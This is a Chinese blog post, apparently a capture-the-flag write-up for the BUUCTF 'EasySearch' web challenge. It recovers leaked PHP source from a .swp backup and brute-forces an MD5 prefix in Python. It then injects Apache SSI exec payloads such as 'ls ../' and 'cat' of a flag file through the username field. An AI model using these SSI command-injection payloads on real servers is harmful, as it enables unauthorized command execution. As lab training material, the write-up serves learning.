buuctf-EasySearch

最新推荐文章于 2024-04-13 22:05:00 发布
最新推荐文章于 2024-04-13 22:05:00 发布
阅读量269 收藏
点赞数
文章标签: php postman 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/124766489
版权

特意搜了下题目,以为有什么提示,结果是一个搜索插件

然后用注入,爆破密码,都没用

扫描后台发现index.php.swp备份(我用御剑没扫出来,下次要安装一些其他的扫描工具,用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。)

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

重点关注这句话输入的password在md5加密后前六位要等于6d0bc1 

$admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6))

python代码 

from hashlib import md5

for i in range(10000000):
    if md5(str(i).encode('utf-8')).hexdigest()[:6] == '6d0bc1':
        print(i)

2020666
2305004
9162671

三选一 

username没做要求

username=<!--#exec cmd="ls"-->&password=2020666

什么都没有,就到处看看,在网络里可以找到url 

 这会报时间,IP,但是抓包后却没有能操作的

1是我们输入的用户名,可以在这操作

url最后跟了shtml,和平常的有些不一样

SSI注入漏洞 

username=<!--#exec cmd="ls"-->&password=2020666

 

 然后

username=<!--#exec cmd="cat flag_990c66bf85a09c664f0b6741840499b2"-->&password=2020666

没有用,因为ls查看的当前一级的文件就是页面显示的,进入页面后路径就变了,cat后面就要加上路径

 

看wp,是用 

username=<!--#exec cmd="ls ../"-->&password=2020666

  

就会直接出来这个 

username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->&password=2020666

 

 

 

 

m0_62094846
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BDJCTF-2020-Web-easy_search
feng的博客
11-05 407
WP 进入环境,看到是个登录页面,第一反应是SQL注入。。。然后我就在SQL注入的路上一去不复返了。 感觉自己就是做题思路不是很开阔,知识点学的差是一个方面,思维的发散性又是一个方面。这题关键的信息在index.php.swp,考虑到自己SQL注入不行,应该去转换思路,去尝试其他的方向,比如备份文件这样的。 不过这题似乎直接扫目录就可以扫到index.php.swp,不过我dirsearch没扫到,还是自己字典的问题,要慢慢增加自己字典的容量。 然后就是代码审计: <?php ob_start();
buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)
weixin_63231007的博客
10-20 1949
如果我们传入 _SESSION[imgflagphp]=1111 会发现 s:10:"img" 我们输入的flagphp被替换为了空,只剩下了img,这样就有反序列化逃逸那味了,逃逸了7个字符。序列化串为:a:4:{s:5:"phone";因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,所以要传_SESSION[img]=s:3:"img";看一下这个序列化串:a:2:{s:10:"img";s:3:"img";
国产搜索引擎崛起:Elasticsearch 国产化加速_elasticsearch国产化取代(1)
最新发布
2401_84170323的博客
04-13 846
Easysearch 作为 Elasticsearch 的国产化替代方案,不仅保持了与原生 Elasticsearch 的高度兼容性,还在功能、性能、稳定性和扩展性方面进行了全面提升。极限科技致力于为用户提供更加安全、可靠、高效的数据处理和分析解决方案。如有需要,请随时联系我们,让我们共同为祖国的信创事业添砖加瓦!
buuCTF [BJDCTF2020]EasySearch 1
weixin_45642610的博客
04-14 1581
buuCTF [BJDCTF2020]EasySearch 1 进去后是这样 扫后台发现index.php.swp备份。 这里吐槽一下。我用dirsearch扫了3次都没出来,最后用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。 要求password的md5值的前6个字符为6d0bc1。敲代码(python): from hashlib import md5 for i in range(10000000): if md5(str(i).
BUUCTF [BJDCTF2020] EasySearch
Senimo
01-06 688
BUUCTF [BJDCTF2020] EasySearch 考点: Apache SSI 远程命令执行 shtml文件 启动环境: 一个登录框,尝试了弱密码与万能密码,均无结果,继续对题目进行信息收集,使用ctf-wscan扫描目录: python3 ctf-wscan.py http://c4567f9c-24a4-42fd-a60f-1e02b2aa1f07.node3.buuoj.cn/ 得到扫描结果,其存在index.php.swp文件: <?php ob_start(); f
拿走不谢!4100套iOS源码,40G!
ChatGPTer
11-10 1747
此时,只需要一张图就可以表达。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
INFINI Labs 产品更新 | 重磅推出 Easysearch v1.1
infinilabs的博客
05-16 312
INFINI Labs 产品更新啦,其中重要产品【INFINI Easysearch】正式亮相,100% 自主可控,内嵌压缩算法极大节省硬件成本,日志存储占用直接砍半。Easysearch 是一个分布式的近实时搜索与分析引擎,核心引擎基于开源的 Apache Lucene。Easysearch 衍生自基于开源协议 Apache 2.0 的 Elasticsearch 7.10.2 版本。欢迎大家下载体验和反馈。
易搜 (EasySearch)-crx插件
04-04
语言:English,中文 (简体),中文 (繁體) 易搜 (EasySearch) 对你选中的关键字提供快捷搜索功能。 易搜 (EasySearch) 对你选中的关键字提供快捷搜索功能。后续版本可以使用自定义搜索功能。更新日志:1.01-增加英文语言支持;-增加自定义搜索功能;-优化核心代码;1.00-发布。
EasySearch
03-16
Make the search easyly HOW TO INSTALL ============== Please copy the easysearch.jar to your JBuilder lib/ext folder, and re-start JBuilder. HOW TO UNINSTALL ================ Exit from JBuilder, and remove easysearch.jar from your JBuilder lib/ext folder. HOW TO USE ========== 1. Select some text in JBuilder Editor pane or copy some text into clipboard. 2. Click the Search button in toolbar, it will search the next text from the cursor position. 3. Click the Highlight button in toolbar, it will highlight all the matched text in editor pane. 4. Ctrl-Up Search the previous text. 5 Ctrl-Down Search the next text.
Easysearch 运行在 Kylin V10 (Lance)-aarch64上
infinilabs的博客
06-06 169
本文主要介绍在国产操作系统 Kylin V10 (Lance)-aarch64 上安装单机版 Easysearch/Console/Agent/Gateway/Loadgen。
BUUCTF [BJDCTF2020]EasySearch
qq_53863234的博客
12-05 2870
Apache SSI 远程命令执行漏洞
dirmap基础
rnn0921的博客
07-17 537
dictmult 该目录为“字典模式”默认多字典文件夹,包含:BAK.min.txt(备份文件小字典),BAK.txt(备份文件大字典),LEAKS.txt(信息泄露文件字典)fuzzmult 该目录为“fuzz模式”默认多字典文件夹,包含:fuzz_mode_dir.txt(默认目录字典),fuzz_mode_ext.txt(默认后缀字典。dict_mode_dict.txt “字典模式”字典,使用dirsearch默认字典。2、字典文件,/root/dirmap/data/-i 扫描目标或网络。
BUUCTF WEB easysearch
qq_41696858的博客
01-07 1955
由于buuctf独特的防扫机制,建议加上 -s -t参数,等个10分钟 查看index.php.swp查看源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[
[BJDCTF2020]EasySearch——ssi
m0_62879498的博客
05-14 448
[BJDCTF2020]EasySearch 1 和上一关相似 是 源码泄露 使用御剑对目录进行扫描 发现了 index.php.swp 0X01 源码分析 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars
web buuctf [BJDCTF2020]EasySearch
weixin_44214568的博客
04-12 536
知识点:Apache SSI漏洞 Apache安全漏洞_0ak1ey的博客-CSDN博客_apache漏洞 Apache SSI远程命令执行漏洞_0ak1ey的博客-CSDN博客_apache命令执行漏洞 Apache SSI 远程命令执行漏洞 - MCY5 - 博客园 1.开题: 看到题目的时候,我就准备用dirsearch扫描,但是没有扫描出来,我又御剑扫了一遍,第一遍没扫出来,我把线程改成1才扫出来的, 2.贴源码 <?php ob_start(); functio.
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值